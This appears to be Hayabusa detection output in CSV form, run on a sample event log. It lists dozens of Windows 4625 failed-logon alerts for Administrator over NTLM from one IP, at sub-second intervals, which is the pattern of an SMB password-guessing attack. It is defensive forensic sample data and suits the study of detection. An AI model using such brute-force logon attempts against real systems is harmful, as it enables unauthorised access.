2016-09-20 01:52:03.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sbJC5yvrIymYgaHY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:03.951 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4schZcUP8Im8Ee1e  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:03.988 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WotargyGlEq9PBch  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:04.025 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2JSMrPoucOR0nzlD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:04.064 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jr4w4uoF2DVZ5n9x  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:04.104 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: v319oZIaOBpuf542  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:04.151 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GNRTL9BLlGWMx6dA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:04.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zHlDIOZ9B5uY8Rzz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:04.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Dr2bvAue8mr5kagX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:04.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pXBds9GoXr6IZUfp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:04.327 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aLYuegjXO18lo342  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:04.367 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: To3MMEEvNXKNjKHT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:04.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: N0HCToTmh3ESGBYt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:04.455 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nNvBueVo3ANNmSSN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:04.499 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mVWOoAG5ermGL2Gl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:04.545 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: W7QYJUNPm5b4jprh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:04.590 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PHllwNJvpH3P97cp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:04.632 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tfT8GtafHGYMlkMf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:04.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nab7wtZfBVkcynsa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:04.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VHiijj7sT9nyqxii  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:04.780 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: v06kkhqYNOyEHx2c  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:04.820 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WSTDX16YK5Zgkjxo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:04.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: u6QWEyTrpndCagP0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:04.914 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7iCaXa5SR5IHJnQA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:04.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DNZhcPd1JaNFZMYG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LeOIg10KS60QplWz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.036 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: um3Nwo2doDbKJJvz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.150 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JuoqbUwc2Nth1xlH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.199 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WF8zKIbeboTLLkC6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.237 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kSyKc8igfuYLMekV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.285 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LHog0TdOci9CCKBa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: R5ilFaQlemZUSNun  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.374 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JOJnv9vFdqr2VSQC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rXaoVN7FvJ5rRDUF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.482 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kaFCT5QYFfmJpEC1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kOdVfL4XUTLp60tC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wFQSXjz0JTlkwpBu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.634 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sgAVlnENp6IzRRDr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JLkeKKFVP5vJjPtl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.751 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EqLXdGmr45vGpu3E  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: m7uTpMLqPgenJdRb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FQn7NqRzpGtjQdfv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8F8EZLHQtEWkeob1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5joxW81M9vcAfbJw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.988 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: iMfmQF3xsaV5SQVZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.040 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QQe9VL8eeco0SdPW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MnMbxQEuczrnMLKc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.137 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3DWOiTIp6JQLq9Vz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: E1ORteg467kiFxmD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.216 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EoVhHZ2lkyAEx0w9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IMSqYaVVGR5v3bXr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.298 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hEEJ05nL0lyatWKL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.349 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SgrcS1NqwVJSEv31  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.395 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CCNTu1A6c6myngXd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.434 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YLx5Hv5GmdvsO9SE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VtS3KUkTVoAWGqbW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.512 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7DxfDEwc6ykrmddu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.552 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: m8yKyocZwOY574pe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JfdmcsxnDHRxJYAA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.649 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: euxBOcdse8NjSzTd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Dw7RZh5jKuRcM1xw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.742 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zIyozsYA1Mn27gl7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.786 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vhJopROjHZi6T8aF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.822 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QZ6XuZO6fIMg52tV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.870 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tvAYEepvDwz93ezW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.919 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6Er95vLjet49OmSQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.960 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OKkMGZ5on5L26cip  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Dp5dq3YYmmLxperL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: klkWqfYoNQQHRISX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Q0EekPO3q6qRfq3i  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.144 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gfG1x6sL4Aqlj7TK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.185 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: owSUehMmDEhijkfl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.224 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: J3xBPT5WiuvmPZHe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
